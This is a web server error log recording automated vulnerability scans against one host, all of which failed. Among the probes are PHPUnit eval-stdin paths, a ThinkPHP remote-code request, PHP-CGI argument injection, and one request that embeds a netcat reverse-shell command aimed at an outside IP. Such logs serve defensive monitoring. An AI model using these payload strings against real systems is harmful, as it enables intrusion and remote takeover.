2026/02/18 11:27:09 [error] 952#952: *98614 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:09 [error] 952#952: *98614 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:09 [error] 952#952: *98614 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:09 [error] 952#952: *98614 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:09 [error] 952#952: *98614 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:09 [error] 952#952: *98614 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:09 [error] 952#952: *98614 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:09 [error] 952#952: *98614 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 12:46:44 [error] 962#962: *98794 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 13:05:55 [error] 962#962: *98800 open() "/var/www/html/.env" failed (2: No such file or directory), client: 77.83.39.82, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51"
2026/02/18 13:15:31 [error] 967#967: *100366 open() "/var/www/html/.well-known/security.txt" failed (2: No such file or directory), client: 162.142.125.35, server: localhost-nginx-proxy-manager, request: "GET /.well-known/security.txt HTTP/1.1", host: "222.117.41.51"
2026/02/18 14:59:31 [error] 962#962: *100695 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:32 [error] 962#962: *100695 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:32 [error] 962#962: *100695 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:33 [error] 962#962: *100695 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:33 [error] 962#962: *100695 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:33 [error] 962#962: *100695 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:34 [error] 962#962: *100695 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:34 [error] 962#962: *100695 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:35 [error] 962#962: *100695 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:35 [error] 962#962: *100695 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:35 [error] 962#962: *100695 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:36 [error] 962#962: *100695 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:36 [error] 962#962: *100695 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:37 [error] 962#962: *100695 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:37 [error] 962#962: *100695 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:37 [error] 962#962: *100695 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:38 [error] 962#962: *100695 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:38 [error] 962#962: *100695 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:38 [error] 962#962: *100695 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:38 [error] 962#962: *100695 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:39 [error] 962#962: *100695 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:39 [error] 962#962: *100695 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:39 [error] 962#962: *100695 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:40 [error] 962#962: *100695 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:40 [error] 962#962: *100695 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:40 [error] 962#962: *100695 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:40 [error] 962#962: *100695 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:41 [error] 962#962: *100695 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:41 [error] 962#962: *100695 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:41 [error] 962#962: *100695 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:42 [error] 962#962: *100695 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:42 [error] 962#962: *100695 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:42 [error] 962#962: *100695 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:43 [error] 962#962: *100695 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:43 [error] 962#962: *100695 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:43 [error] 962#962: *100695 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:44 [error] 962#962: *100695 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:44 [error] 962#962: *100695 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:44 [error] 962#962: *100695 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:45 [error] 962#962: *100695 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 14:59:46 [error] 962#962: *100695 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 15:06:35 [error] 962#962: *100697 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 45.148.10.246, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+144.172.73.168+9898+%3E%2Ftmp%2Ff) HTTP/1.1", host: "222.117.41.51"
2026/02/18 15:26:06 [error] 962#962: *100704 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 144.79.133.252, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:02:07 [error] 961#961: *100767 open() "/var/www/html/dispatch.asp" failed (2: No such file or directory), client: 195.3.221.86, server: localhost-nginx-proxy-manager, request: "GET /dispatch.asp HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:21 [error] 963#963: *100770 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:22 [error] 963#963: *100770 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:22 [error] 963#963: *100770 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:22 [error] 963#963: *100770 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:23 [error] 963#963: *100770 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:23 [error] 963#963: *100770 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:23 [error] 963#963: *100770 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:23 [error] 963#963: *100770 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:23 [error] 963#963: *100770 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:24 [error] 963#963: *100770 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:24 [error] 963#963: *100770 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:24 [error] 963#963: *100770 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:24 [error] 963#963: *100770 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:25 [error] 963#963: *100770 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:25 [error] 963#963: *100770 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:25 [error] 963#963: *100770 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:25 [error] 963#963: *100770 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:25 [error] 963#963: *100770 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:26 [error] 963#963: *100770 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:26 [error] 963#963: *100770 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:26 [error] 963#963: *100770 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:26 [error] 963#963: *100770 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:27 [error] 963#963: *100770 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:27 [error] 963#963: *100770 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:27 [error] 963#963: *100770 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:27 [error] 963#963: *100770 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:28 [error] 963#963: *100770 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:28 [error] 963#963: *100770 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:28 [error] 963#963: *100770 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:28 [error] 963#963: *100770 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:29 [error] 963#963: *100770 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:29 [error] 963#963: *100770 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:29 [error] 963#963: *100770 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:29 [error] 963#963: *100770 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:30 [error] 963#963: *100770 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 17:10:30 [error] 963#963: *100770 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 43.159.141.115, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
